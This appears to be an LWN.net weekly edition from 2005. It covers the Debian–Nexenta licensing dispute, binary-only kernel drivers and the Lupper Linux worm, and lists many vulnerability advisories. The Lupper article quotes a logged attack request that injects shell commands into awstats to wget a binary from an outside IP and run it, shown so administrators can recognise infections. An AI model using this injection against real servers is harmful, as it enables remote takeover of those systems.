Debian and Nexenta collide
When Sun Microsystems decided to release Solaris under the CDDL
license, it did so with the knowledge that this code could not be combined
with GPL-licensed code. That incompatibility was pretty much guaranteed to
create some interesting conflicts at some time. That time appears to have
arrived, thanks to the release of
Nexenta, a Debian-based system
built on top of the Solaris kernel and runtime libraries. How this
conflict is resolved may set the tone for how the GPL and CDDL worlds
intersect in the future.
The Nexenta developers got off to a bit of a bad start by announcing its existence while
putting its entire web site behind a password gate. Once general access
was allowed, developers discovered that binaries of their software were
being distributed without the associated source. The Nexenta developers responded in a rather unhelpful manner:
Also some stuff not committed yet, beca[u]se we are testing them. In
2-3 months we are hoping to sort out all these "starting" issues
with code browsing, scripts availability, etc.
Anybody who has hung around anywhere near the Debian community for any
period of time will know immediately that this sort of answer is unlikely
to go over well. Various developers responded with requests to delete the
binaries immediately, and some even pondered the use of a DMCA takedown
notice. The Nexenta developers appear to have taken the hint, and source
availability has improved, though the occasional glitch still comes to
light.
The hardest issue, however, remains unresolved. The Nexenta project uses,
along with the Solaris kernel, a number of user-space libraries (including
the core C library) from Solaris. These libraries, being licensed under
the CDDL, are not compatible with GPL-licensed applications. But much of
Nexenta's user space is GPL licensed, and is linked against Sun's libc.
And, in particular, much of the management infrastructure which makes
Nexenta a Debian-derived distribution is built this way.
Several Debian developers are claiming that distributing GPL-licensed
applications linked to a CDDL libc constitutes copyright infringement and
should be stopped. The Nexenta developers, instead, justify this distribution by
citing the "system software" exemption in section 3 of the GPL:
However, as a special exception, the source code distributed need
not include anything that is normally distributed (in either source
or binary form) with the major components (compiler, kernel, and so
on) of the operating system on which the executable runs, unless
that component itself accompanies the executable.
This exemption has allowed the distribution of, for example, binaries of
GPL applications for Solaris for many years. The Debian folks respond that
this situation is different: since the libraries and the GPL applications
are all part of the Nexenta distribution, the CDDL-licensed libc does,
indeed, accompany the executable, and the exemption does not apply.
The Nexenta developers do not appear to entirely buy this argument. They
have suggested, however, that Nexenta could be split into two pieces: the
CDDL-licensed core, and the GPL-licensed applications. Once the core is
installed, the applications could be brought in from a repository
somewhere. The only problem there is that bringing in those applications
requires the use of (GPL-licensed) tools like dpkg, which would thus have
to be distributed with the core system. Getting past this little bootstrap
issue could be a challenge.
Once again, Nexenta has not helped itself here: project developers have suggested that the Debian community might want
to help them out by relicensing dpkg under CDDL-compatible terms. Suffice
to say that this idea was not received enthusiastically. The idea of rewriting dpkg as a CDDL application has also
been raised, though that raises some issues of its own.
A more plausible solution to this problem might be to get Sun to relicense
its libraries in a GPL-compatible way. Nobody has asked Sun (publicly, at
least) whether it would be willing to take this step, but, once again, Sun
was certainly aware of the consequences of its licensing decisions when it
made them. This situation could also be resolved by porting the GNU C
library to the Solaris kernel and shipping it with Nexenta. This is
evidently a big task, and the Nexenta developers (who seem to be fairly
small in number) are not thrilled about taking it on.
The licensing issues are real, and need to be worked out. But many of the
people involved in the debate appear to have lost track of the fact that
the Nexenta project, while perhaps being occasionally arrogant and ignorant
of how Debian does things, is trying to make a contribution to the free
software world. It is a free software project.
Anthony Towns has been almost the lone voice in calling for a higher degree of cooperation
with Nexenta:
I'm amazed at the level of intolerance that's greeting a pretty
major contribution to the free software community. There are, what,
five major OS/kernels for PCs/workstations these days -- Windows,
OS X, Solaris, BSD and Linux. How does it make any sense at all to
be hostile to the fact that now four out of those five are free at
their core?
He also points out that Debian's hands have not always been 100% clean, and
that there is more to gain by helping a project like this toward
free-software purity than by threatening legal action against it. With
luck, the community will hear this message. What Nexenta is doing is very
much within the spirit of free software licensing; with patience and help,
they should be able to get within the letter of those licenses as well.
Comments (84 posted)
On binary drivers and stable interfaces
There has recently been a surge of discussion, once again, on whether the
Linux kernel should support closed-source drivers. The debate was driven,
perhaps, by the
suspicion (later
put to rest)
that OSDL was supporting the creation of a stable binary driver ABI for
Linux. So perhaps the time has come to review the reasons why the kernel
developers are opposed to closed-source drivers. Our apologies to all of
you who have seen this before.
Support for binary-only drivers seems, on the surface, like it could be a
good idea. Companies could provide Linux drivers for their hardware
without exposing their "valuable intellectual property" to the world.
Users would have a higher degree of assurance that their hardware would
simply work. All of the current hardware hassles would go away, and
everybody would be happy. What could be wrong with that?
One obvious problem is that, with a proprietary driver, a Linux system
loses one of its best characteristics: independence from vendors. A user
of a proprietary driver depends on the vendor for fixes and updates, but
the vendor is under no obligation to provide them. Computing hardware has
a notoriously short product life; if the vendor drops driver support when a
product hits the end of its life, there is little that a user can do. If
the vendor goes out of business, there will be no further support for the
driver. If the vendor decides to start charging for driver updates, the
user has little option but to pull out the wallet.
If the driver has a bug which affects the stability of the system,
only the vendor can fix it.
And history shows that proprietary drivers tend to have plenty of bugs.
They are often written by developers with little time and even less
expertise with the Linux kernel. The code does not go through any sort of
peer review, so obvious problems will persist into the final product. And,
since only the vendor can fix the driver, bugs can last for a long time.
Binary drivers are brittle.
The kernel API can and does change; that aspect of the kernel is not going
away. Freezing an API would limit the developers' ability to fix poor
interfaces, improve how the kernel works, and remove cruft. So binary
drivers will always be likely to break between kernel releases, and users
will have to wait for the vendor to get around to catching up with the
current API.
Linux kernel developers will not help users who have proprietary drivers
loaded into their systems. That is not because the developers want to be
petty and vengeful (well, perhaps one or two of them do); it is simply that
the developers have no way to track down problems when closed-source code
is running.
Even if a vendor offers top-quality drivers and support, it is unlikely
that said vendor supports all of the architectures that run Linux. Freedom
to run on something other than i386 is one of the great advantages of
Linux; proprietary code takes that freedom away.
Finally, proprietary drivers may constitute copyright infringement.
Certainly some developers feel that kernel modules are derived products of
the kernel itself, and thus required to carry the kernel's (GPL) license.
Whether the module interface constitutes a boundary which the GPL cannot
cross can only, in the end, be determined by the courts. Until then, every
proprietary driver carries with it a degree of legal uncertainty.
None of this is new; here's what Linus Torvalds said
back in 1999:
Basically, I want people to know that when they use binary-only
modules, it's THEIR problem. I want people to know that in their
bones, and I want it shouted out from the rooftops. I want people
to wake up in a cold sweat every once in a while if they use
binary-only modules.
The alternative to cold sweats is to stick with hardware which comes with
free drivers. In most areas, finding such hardware is not a challenge. In
the cases where it can be a problem (video adapters, some wireless network
cards), the solution is not to weigh down the kernel with some sort of
set-in-stone ABI. As Linux continues to grow in popularity - and
proprietary drivers get harder to write and maintain - recalcitrant vendors
should eventually come around. That's exactly what has tended to happen
thus far.
Comments (37 posted)
A quick update on subscriber links
As we
noted last week, the
"subscriber link" feature is now active on the site. With these links, a
subscriber can hand out "get in free" tickets to specific subscriber-only
articles. To do so, you need only pull up the article (if you are reading
it in the Weekly Edition, click on the "comments" link at the bottom to get
there) and use the "send a link" option in the left column.
Initially the feature was only made available to "project leader"
subscribers. Based on the feedback we have received (and the original
plan, in any case), subscriber links are now available to all subscribers.
We will continue to think of ways to make added features available to the
higher-level subscribers, but this feature did not seem like the right one
to use this way.
An unanticipated side benefit of this feature has already become clear. By
looking at the list of outstanding subscriber links, we can quickly see
which of our articles are considered sufficiently interesting to make links
for. That is a level of feedback we didn't have before. For the curious,
last week's winners were A study
on free software in British schools and Sony, rootkits, and the escalation
of the DRM war.
Finally, we'll note that readers coming in on a subscriber link may now be
presented with a tasteful pitch for LWN subscriptions. Happily, our initial plans
for a Flash-based, popup ad were abandoned after a few milliseconds worth
of thought. Hopefully the use of subscriber links will eventually lead to
more subscribers for LWN. Meanwhile, please enjoy the feature, and we
thank you for helping us to design it.
Comments (7 posted)
Page editor: Jonathan Corbet
Security
The Lupper worm
Security companies and Linux critics worldwide have been happy to proclaim
the existence of the "Lupper" worm, the first Linux-based worm to hit the
net in years. This worm gets into systems by way of the various PHP
XML-RPC vulnerabilities which have been reported (and fixed) over the last
year. Infected systems, apparently, become part of a distributed bot net,
waiting for somebody to tell them what to do.
According to McAfee's Lupper
page, there are a couple of signs of infection: processes listening on
UDP ports 7111 and 7222, and a /tmp/lupii file. Attempted
infections can be seen in the web server logs; they look something like
either of following:
GET /awstats/awstats.pl?configdir=|echo;echo YYY; \
cd /tmp;wget 24.224.174.18/listen;chmod +x listen; \
./listen 216.102.212.115;echo YYY;echo|
POST /drupal/xmlrpc.php
(The first line has been broken up, and %-escapes have been replaced for
readability).
The above lines were taken directly from the LWN.net server log. Thus far,
our server has bravely fended off Lupper attacks from all of five different
sources. So it looks like the attack of the Lupper worm is unlikely to
bring down the net as a whole.
In fact, it would be easy to write off this worm altogether. It attacks
vulnerabilities which few systems had in the first place. Said
vulnerabilities were disclosed - and fixed - months ago. Even Fedora
Legacy - which has not produced an update since September 15 - managed
to get a fix out for this problem. Any system whose administrator applies
security updates will not have been affected by this particular worm. Most
administrators need not go into red-alert status over this one.
That said, it behooves us to notice that Lupper is, indeed, a Linux worm
propagating in the wild. Any of us who feel that, because we are running
Linux, we are immune from worms and other such annoyances have just
received a gentle warning. Someday, somebody will write a worm which
exploits a vulnerability which is widespread and which has not been known
for months. Indeed, they might happen upon a hole which has not been
disclosed at all. On that day, we may all find ourselves feeling rather
less smug.
Comments (24 posted)
Security news
Remote vulnerability in clamav
For those of you running clamav on your mail streams: a remote code
execution vulnerability has been disclosed in this package. Exploits in
the near future would not be a surprising development. Upgrade to version
0.87.1 for the fix, or apply the distributor updates sure to come soon.
Click below for the advisory.
Full Story (comments: none)
New vulnerabilities
chmlib: several vulnerabilities
| Package(s): | chmlib |
CVE #(s): | CVE-2005-2659
CVE-2005-2930
CVE-2005-3318
|
| Created: | November 7, 2005 |
Updated: | November 28, 2005 |
| Description: |
Several vulnerabilities have been discovered in chmlib, a library for
dealing with CHM format files. |
| Alerts: |
|
Comments (none posted)
clamav: multiple vulnerabilities
| Package(s): | clamav |
CVE #(s): | CVE-2005-3239
CVE-2005-3500
CVE-2005-3501
CVE-2005-3303
|
| Created: | November 7, 2005 |
Updated: | November 9, 2005 |
| Description: |
Multiple security holes were found in clamav that may allow attackers to
cause a denial of service, memory corruption and execution of arbitrary code. |
| Alerts: |
|
Comments (none posted)
gpsdrive: format string vulnerability
| Package(s): | gpsdrive |
CVE #(s): | CVE-2005-3523
|
| Created: | November 9, 2005 |
Updated: | November 9, 2005 |
| Description: |
The gpsdrive navigation system contains a format string vulnerability which could be exploited to execute arbitrary code. |
| Alerts: |
|
Comments (none posted)
horde3: design error
| Package(s): | horde3 |
CVE #(s): | CVE-2005-3344
|
| Created: | November 7, 2005 |
Updated: | November 9, 2005 |
| Description: |
Mike O'Connor discovered that the default installation of Horde3 on
Debian includes an administrator account without a password. Already
configured installations will not be altered by this update. |
| Alerts: |
|
Comments (none posted)
libungif: memory corruption
| Package(s): | libungif |
CVE #(s): | CAN-2005-2974
|
| Created: | November 3, 2005 |
Updated: | March 20, 2006 |
| Description: |
The libungif library has a vulnerability in the GIF file
colormap handling code. A maliciously crafted GIF file can
cause out of bounds memory writing and register corruption. |
| Alerts: |
|
Comments (none posted)
php: multiple vulnerabilities
| Package(s): | php |
CVE #(s): | CVE-2005-3390
CVE-2005-3389
CVE-2005-3388
CVE-2005-3353
|
| Created: | November 8, 2005 |
Updated: | December 23, 2005 |
| Description: |
There are multiple vulnerabilities in PHP, including malicious requests may overwrite the GLOBALS array, the parse_str() function may enable the
register_globals setting, cross-site scripting bugs in phpinfo() and a bug in EXIF image parsing that may crash the process. |
| Alerts: |
|
Comments (none posted)
pwdutils: privilege escalation
| Package(s): | pwdutils shadow |
CVE #(s): | |
| Created: | November 4, 2005 |
Updated: | November 9, 2005 |
| Description: |
Thomas Gerisch found that the setuid 'chfn' program contained in the
pwdutils suite insufficiently checks it's arguments when changing the GECOS
field. This bug leads to a trivially exploitable local privilege escalation
that allows users to gain root access. |
| Alerts: |
|
Comments (none posted)
spamassassin: denial of service
| Package(s): | spamassassin |
CVE #(s): | CVE-2005-3351
|
| Created: | November 9, 2005 |
Updated: | March 7, 2006 |
| Description: |
Spamassassin through version 3.0.4 can be made to dump core if a message arrives with too many addresses in the To: field. |
| Alerts: |
|
Comments (none posted)
sylpheed: buffer overflow
| Package(s): | sylpheed |
CVE #(s): | CVE-2005-3354
|
| Created: | November 9, 2005 |
Updated: | January 6, 2006 |
| Description: |
The sylpheed mail client, prior to versions 1.0.6 and 2.0.4, contains a buffer overflow in the LDIF address book import code. |
| Alerts: |
|
Comments (none posted)
thttpd: insecure temp file
| Package(s): | thttpd |
CVE #(s): | CVE-2005-3124
|
| Created: | November 4, 2005 |
Updated: | November 9, 2005 |
| Description: |
Javier Fernández-Sanguino Peña from the Debian Security Audit team
discovered that the syslogtocern script from thttpd, a tiny webserver,
uses a temporary file insecurely, allowing a local attacker to craft a
symlink attack to overwrite arbitrary files. |
| Alerts: |
|
Comments (none posted)
Updated vulnerabilities
a2ps: input validation error
| Package(s): | a2ps |
CVE #(s): | CAN-2004-1170
CAN-2004-1377
|
| Created: | November 26, 2004 |
Updated: | December 19, 2005 |
| Description: |
The GNU a2ps utility fails to properly sanitize filenames, which can be
abused by a malicious user to execute arbitrary commands with the
privileges of the user running the vulnerable application. More
information at Security
Focus. |
| Alerts: |
|
Comments (none posted)
abiword: buffer overflow
| Package(s): | abiword |
CVE #(s): | CAN-2005-2964
|
| Created: | September 29, 2005 |
Updated: | November 14, 2005 |
| Description: |
The RTF import module of the AbiWord word processor has a
buffer overflow vulnerability. A user can be tricked into
opening a maliciously crafted RTF file, giving the attacker
the ability to execute code with the permissions of the user. |
| Alerts: |
|
Comments (none posted)
apache information disclosure if modssl=yes
| Package(s): | apache |
CVE #(s): | CAN-2005-2700
|
| Created: | September 2, 2005 |
Updated: | November 10, 2005 |
| Description: |
An information disclosure vulnerability was discovered in mod_ssl, the SSL/TLS module of the Apache webserver. When "SSLVerifyClient optional" was configured in the global virtual host configuration, an "SSLVerifyClient require" in per-location context was not enforced.
|
| Alerts: |
|
Comments (none posted)
httpd: off-by-one overflow and cross-site scripting
| Package(s): | apache httpd |
CVE #(s): | CAN-2005-1268
CAN-2005-2088
|
| Created: | July 25, 2005 |
Updated: | November 7, 2005 |
| Description: |
Watchfire reported a flaw that occurred when using the Apache server as an
HTTP proxy. A remote attacker could send an HTTP request with both a
"Transfer-Encoding: chunked" header and a "Content-Length" header. This
caused Apache to incorrectly handle and forward the body of the request in
a way that the receiving server processes it as a separate HTTP request.
This could allow the bypass of Web application firewall protection or lead
to cross-site scripting (XSS) attacks.
Marc Stern reported an off-by-one overflow in the mod_ssl CRL verification
callback. In order to exploit this issue the Apache server would need to
be configured to use a malicious certificate revocation list (CRL). |
| Alerts: |
|
Comments (none posted)
awstats: command injection vulnerability
| Package(s): | awstats |
CVE #(s): | CAN-2005-1527
|
| Created: | August 11, 2005 |
Updated: | November 10, 2005 |
| Description: |
AWStats has a command injection vulnerability that can
be exploited by specially crafting referrer URLs that
contain Perl code. The code can then be executed with the
privileges of the web server. |
| Alerts: |
|
Comments (2 posted)
bzip2: race condition and infinite loop
| Package(s): | bzip2 |
CVE #(s): | CAN-2005-0953
CAN-2005-1260
|
| Created: | May 17, 2005 |
Updated: | January 10, 2007 |
| Description: |
A race condition in bzip2 1.0.2 and earlier allows local users to modify
permissions of arbitrary files via a hard link attack on a file while it is
being decompressed, whose permissions are changed by bzip2 after the
decompression is complete. Also specially crafted bzip2 archives may cause
an infinite loop in the decompressor. |
| Alerts: |
|
Comments (2 posted)
common-lisp-controller: design error
| Package(s): | common-lisp-controller |
CVE #(s): | CAN-2005-2657
|
| Created: | September 14, 2005 |
Updated: | November 21, 2005 |
| Description: |
François-René Rideau discovered a bug in common-lisp-controller, a
Common Lisp source and compiler manager, that allows a local user to
compile malicious code into a cache directory which is executed by
another user if that user has not used Common Lisp before.
|
| Alerts: |
|
Comments (none posted)
cpio: directory traversal
| Package(s): | cpio |
CVE #(s): | CAN-2005-1111
|
| Created: | June 20, 2005 |
Updated: | December 26, 2005 |
| Description: |
There is a vulnerability in
cpio (2.6 and previous) that allows a malicious cpio file to
extract to an arbitrary directory of the attackers choice. cpio will
extract to the path specified in the cpio file, this path can be absolute. |
| Alerts: |
|
Comments (1 posted)
curl/wget: NTLM username buffer overflow
| Package(s): | curl wget |
CVE #(s): | CAN-2005-3185
|
| Created: | October 14, 2005 |
Updated: | November 7, 2005 |
| Description: |
A vulnerability in libcurl's NTLM function can overflow a stack-based
buffer if given too long a user name or domain name in NTLM authentication
is enabled and either a) pass a user and domain name to libcurl that
together are longer than 192 bytes or b) allow (lib)curl to follow HTTP
redirects and the new URL contains a URL with a user and domain name that
together are longer than 192 bytes. See this iDEFENSE Labs advisory for more details. |
| Alerts: |
|
Comments (none posted)
cyrus-imapd: buffer overflows
| Package(s): | cyrus-imapd |
CVE #(s): | CAN-2005-0546
|
| Created: | February 23, 2005 |
Updated: | April 9, 2006 |
| Description: |
Cyrus-imapd, prior to version 2.2.12, contains several buffer overflows which could be exploited by an (authenticated) attacker to run code on the server system. |
| Alerts: |
|
Comments (none posted)
dia: missing input sanitizing
| Package(s): | dia |
CVE #(s): | CAN-2005-2966
|
| Created: | October 4, 2005 |
Updated: | April 6, 2006 |
| Description: |
Joxean Koret discovered that the SVG import plugin did not properly
sanitize data read from an SVG file. By tricking an user into opening
a specially crafted SVG file, an attacker could exploit this to
execute arbitrary code with the privileges of the user. |
| Alerts: |
|
Comments (none posted)
elm: buffer overflow
| Package(s): | elm |
CVE #(s): | CAN-2005-2665
|
| Created: | August 23, 2005 |
Updated: | November 10, 2005 |
| Description: |
A buffer overflow flaw in Elm was
discovered that was triggered by viewing a mailbox containing a message
with a carefully crafted 'Expires' header. An attacker could create a
malicious message that would execute arbitrary code with the privileges of
the user who received it. |
| Alerts: |
|
Comments (none posted)
emacs21: format string vulnerability in "movemail"
| Package(s): | emacs21 |
CVE #(s): | CAN-2005-0100
|
| Created: | February 7, 2005 |
Updated: | May 15, 2006 |
| Description: |
Max Vozeler discovered a format string vulnerability in the "movemail"
utility of Emacs. By sending specially crafted packets, a malicious
POP3 server could cause a buffer overflow, which could be exploited to
execute arbitrary code with the privileges of the user and the "mail"
group. |
| Alerts: |
|
Comments (none posted)
enigmail: information disclosure
| Package(s): | enigmail |
CVE #(s): | CVE-2005-3256
|
| Created: | October 20, 2005 |
Updated: | December 13, 2005 |
| Description: |
The key selection dialog from the Mozilla Thunderbird enigmail plugin
has an information disclosure vulnerability.
A key with an empty user id from a user's keyring will be used by
default, allowing a message to be decrypted. This can lead to an
unauthorized information disclosure. |
| Alerts: |
|
Comments (none posted)
enscript: arbitrary code execution
| Package(s): | enscript |
CVE #(s): | CAN-2004-1184
CAN-2004-1185
CAN-2004-1186
|
| Created: | January 21, 2005 |
Updated: | May 27, 2006 |
| Description: |
Erik Sjölund has discovered several security relevant problems in enscript,
a program to convert ASCII text into Postscript and other formats.
Unsanitized input can cause the execution of arbitrary commands via EPSF
pipe support. Due to missing sanitizing of filenames it is possible that a
specially crafted filename can cause arbitrary commands to be executed.
Multiple buffer overflows can cause the program to crash. |
| Alerts: |
|
Comments (none posted)
ethereal: multiple vulnerabilities
Comments (none posted)
evolution: format string issues
Comments (2 posted)
fetchmailconf: insecure file creation
| Package(s): | fetchmail |
CVE #(s): | CVE-2005-3088
|
| Created: | October 26, 2005 |
Updated: | November 22, 2005 |
| Description: |
The fetchmailconf utility can create files which are world-readable for a brief period. These files may contain passwords, and thus should not be created in this manner.
|
| Alerts: |
|
Comments (none posted)
firefox: multiple vulnerabilities
Comments (none posted)
Foomatic: Arbitrary command execution in foomatic-rip
| Package(s): | foomatic |
CVE #(s): | CAN-2004-0801
|
| Created: | September 20, 2004 |
Updated: | May 31, 2006 |
| Description: |
There is a vulnerability in the foomatic-filters package. This
vulnerability is due to insufficient checking of command-line parameters
and environment variables in the foomatic-rip filter. This vulnerability
may allow both local and remote attackers to execute arbitrary commands on
the print server with the permissions of the spooler. |
| Alerts: |
|
Comments (none posted)
gaim: buffer overflow
| Package(s): | gaim |
CVE #(s): | CAN-2005-2103
|
| Created: | August 10, 2005 |
Updated: | February 27, 2006 |
| Description: |
Gaim suffers from a heap-based buffer overflow which can be exploited via a hostile "away message" to execute arbitrary code. |
| Alerts: |
|
Comments (none posted)
gallery: privilege escalation
| Package(s): | gallery |
CVE #(s): | CVE-2005-2596
|
| Created: | November 2, 2005 |
Updated: | November 2, 2005 |
| Description: |
The gallery system has a bug which can allow all PostNuke users full access to the gallery. |
| Alerts: |
|
Comments (none posted)
gdb: multiple vulnerabilities
| Package(s): | gdb |
CVE #(s): | CAN-2005-1704
CAN-2005-1705
|
| Created: | May 20, 2005 |
Updated: | August 11, 2006 |
| Description: |
Tavis Ormandy of the Gentoo Linux Security Audit Team discovered an integer
overflow in the BFD library, resulting in a heap overflow. A review also
showed that by default, gdb insecurely sources initialization files from
the working directory. Successful exploitation would result in the
execution of arbitrary code on loading a specially crafted object file or
the execution of arbitrary commands. |
| Alerts: |
|
Comments (5 posted)
gtk-pixbuf, gtk2: denial of service
| Package(s): | gdk-pixbuf gtk2 |
CVE #(s): | CAN-2005-0891
|
| Created: | March 30, 2005 |
Updated: | December 19, 2005 |
| Description: |
The BMP image processing code in gdk-pixbuf and gtk2 contains a denial of service vulnerability exploitable via a specially crafted image file.
|
| Alerts: |
|
Comments (none posted)
gettext: Insecure temporary file handling
| Package(s): | gettext |
CVE #(s): | CAN-2004-0966
|
| Created: | October 11, 2004 |
Updated: | March 1, 2006 |
| Description: |
gettext insecurely creates temporary files in world-writeable directories
with predictable names. A local attacker could create symbolic links in
the temporary files directory, pointing to a valid file somewhere on the
filesystem. When gettext is called, this would result in file access with
the rights of the user running the utility, which could be the root user. |
| Alerts: |
|
Comments (1 posted)
glibc: tempfile vulnerability in catchsegv script
| Package(s): | glibc |
CVE #(s): | CAN-2004-0968
|
| Created: | October 21, 2004 |
Updated: | November 14, 2005 |
| Description: |
The catchsegv script in the glibc package has a symlink vulnerability
that may allow a local user to overwrite arbitrary
files with the permissions of the user that is running the script. |
| Alerts: |
|
Comments (none posted)
gnump3d: cross-site scripting, directory traversal
| Package(s): | gnump3d |
CVE #(s): | CVE-2005-3122
CVE-2005-3123
|
| Created: | October 28, 2005 |
Updated: | November 7, 2005 |
| Description: |
Steve Kemp discovered two vulnerabilities in gnump3d, a streaming
server for MP3 and OGG files. |
| Alerts: |
|
Comments (none posted)
groff: insecure temporary directory
| Package(s): | groff |
CVE #(s): | CAN-2004-0969
|
| Created: | November 1, 2004 |
Updated: | February 9, 2006 |
| Description: |
Recently, Trustix Secure Linux discovered a vulnerability in the groff
package. The utility "groffer" created a temporary directory in an
insecure way, which allowed exploitation of a race condition to create
or overwrite files with the privileges of the user invoking the
program. |
| Alerts: |
|
Comments (none posted)
gzip: arbitrary command execution
| Package(s): | gzip |
CVE #(s): | CAN-2005-0758
|
| Created: | August 1, 2005 |
Updated: | January 9, 2007 |
| Description: |
zgrep in gzip before 1.3.5 does not handle shell metacharacters like '|'
and '&' properly when they occurred in input file names. This could be
exploited to execute arbitrary commands with user privileges if zgrep is
run in an untrusted directory with specially crafted file names. |
| Alerts: |
|
Comments (2 posted)
htdig: cross site scripting
| Package(s): | htdig |
CVE #(s): | CAN-2005-0085
|
| Created: | February 14, 2005 |
Updated: | January 10, 2006 |
| Description: |
Michael Krax discovered that ht://Dig fails to validate the 'config'
parameter before displaying an error message containing the parameter.
This flaw could allow an attacker to conduct cross-site scripting
attacks. |
| Alerts: |
|
Comments (none posted)
imap: buffer overflow in c-client
| Package(s): | imap |
CVE #(s): | CAN-2003-0297
|
| Created: | February 18, 2005 |
Updated: | April 9, 2006 |
| Description: |
A buffer overflow flaw was found in the c-client IMAP client. An attacker
could create a malicious IMAP server that if connected to by a victim could
execute arbitrary code on the client machine. |
| Alerts: |
|
Comments (none posted)
junkbuster: heap corruption and settings modification
| Package(s): | junkbuster |
CVE #(s): | CVE-2005-1108
CVE-2005-1109
|
| Created: | April 13, 2005 |
Updated: | November 5, 2005 |
| Description: |
JunkBuster through version 2.02-r2 contains two vulnerabilities: a heap corruption bug and a possible privacy violation. |
| Alerts: |
|
Comments (1 posted)
kdebase: local root vulnerability
| Package(s): | kdebase |
CVE #(s): | CAN-2005-2494
|
| Created: | September 7, 2005 |
Updated: | August 11, 2006 |
| Description: |
The kdebase package (and kcheckpass in particular) found in KDE versions 3.2.0 through 3.4.2 suffers from a lock file handling error which can enable a local attacker to obtain root access. See this advisory for details. |
| Alerts: |
|
Comments (none posted)
kdelibs: kate backup file permission leak
| Package(s): | kdelibs kate kwrite |
CVE #(s): | CAN-2005-1920
|
| Created: | July 19, 2005 |
Updated: | November 27, 2006 |
| Description: |
Kate / Kwrite, as shipped with KDE 3.2.x up to including 3.4.0, creates a file backup before saving a modified file. These backup files are created with default permissions, even if the original file had more strict permissions set. See this advisory for more information. |
| Alerts: |
|
Comments (none posted)
kernel: multiple vulnerabilities
Comments (none posted)
koffice: KWord RTF import buffer overflow
| Package(s): | koffice |
CVE #(s): | CAN-2005-2971
|
| Created: | October 12, 2005 |
Updated: | November 7, 2005 |
| Description: |
The KOffice RTF import module suffers from a buffer overflow vulnerability
which could be exploited via a malicious RTF file. See the KDE
advisory for details. |
| Alerts: |
|
Comments (none posted)
krb5: double-free flaw
| Package(s): | krb5 |
CVE #(s): | CAN-2004-0175
CAN-2005-0488
CAN-2005-1175
CAN-2005-1689
|
| Created: | July 12, 2005 |
Updated: | December 6, 2005 |
| Description: |
The krb5 authentication has a double-free flaw which may be
initiated by a remote unauthenticated attacker.
Also, a single byte heap overflow in the krb5_unparse_name() function
can lead to a denial of service and an information disclosure may
be caused by a malicious telnet server. See
This report for more
information. |
| Alerts: |
|